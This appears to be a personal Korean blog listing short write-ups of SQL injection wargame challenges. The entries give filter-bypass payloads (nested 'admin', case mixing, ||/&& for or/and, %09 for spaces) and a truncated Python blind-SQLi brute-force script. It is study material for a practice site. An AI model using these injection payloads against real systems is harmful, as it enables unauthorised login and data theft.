메모장

내가 보고 내가 참고하기 위해서 만든 블로그

웹해킹

저번과 같이 id가 admin이면 된다. 그러나 이번엔 id를 strtolower함수를 이용해서 소문자로 바꾸고 admin키워드를 없애버린다. 문제 해결 방안은 adadminmin과 같이 admin사이에 admin을 넣으면 가운데 admin이 사라져 문제가 풀리게된다. clear!

2023. 7. 2.

웹해킹

드디어 지겨운 blind sqli에서 넘어 갔다. 문제에서는 id가 admin이면 되지만 preg_match함수에서 admin문자열을 필터링한다. 하지만 뒤에 플래그 i가 없어 대소문자 구별을 한다!! 따라서 Admin, ADmin, AdMin,ADMIN등등 대소문자 섞어서 입력하면 풀린다!!

2023. 7. 2.

웹해킹

전에 썼던 코드에서 or과 and를 각각 || %26%26(&&)로 바꾸고 공백 몇개를 수정해서 사용했다. import requests URL = "https://los.rubiya.kr/chall/orge_bad2f25db233a7542be75844e314e9f3.php" cookies = {'PHPSESSID': '각자 쿠키값'} password = '' for length in range(1,9):#비밀번호 길이 수만큼 반복 for pw in range(48, 128):#아스키에서 숫자, 알파벳, 특수 문자, 구두점, 공백 포함 payload = "?pw=1' || id='admin'%26%26 ascii(substr(pw,"+str(length)+",1))='"+str(pw) #?pw=1' || ..

2023. 7. 2.

웹해킹

문제에서는 or과 and를 필터링하고 있는 모습이다. 그렇다면 or and를 대신하는 기호를 사용하면 문제가 풀릴 거다. or과 and는 각각 ||, &&로 바꿀 수있다. URL: ?pw=1%27%20||%20id%20=%20%27admin pw='1' || id = 'admin'

2023. 7. 1.

웹해킹

공백이 필터링되는 문제다. 하지만 공백은 %09나 주석으로 우회가 가능하다. 나는 그래서 %09로 우회를 했다. URL: ?pw=1%27%09or%09id=%27admin pw='1' or id='admin'

2023. 7. 1.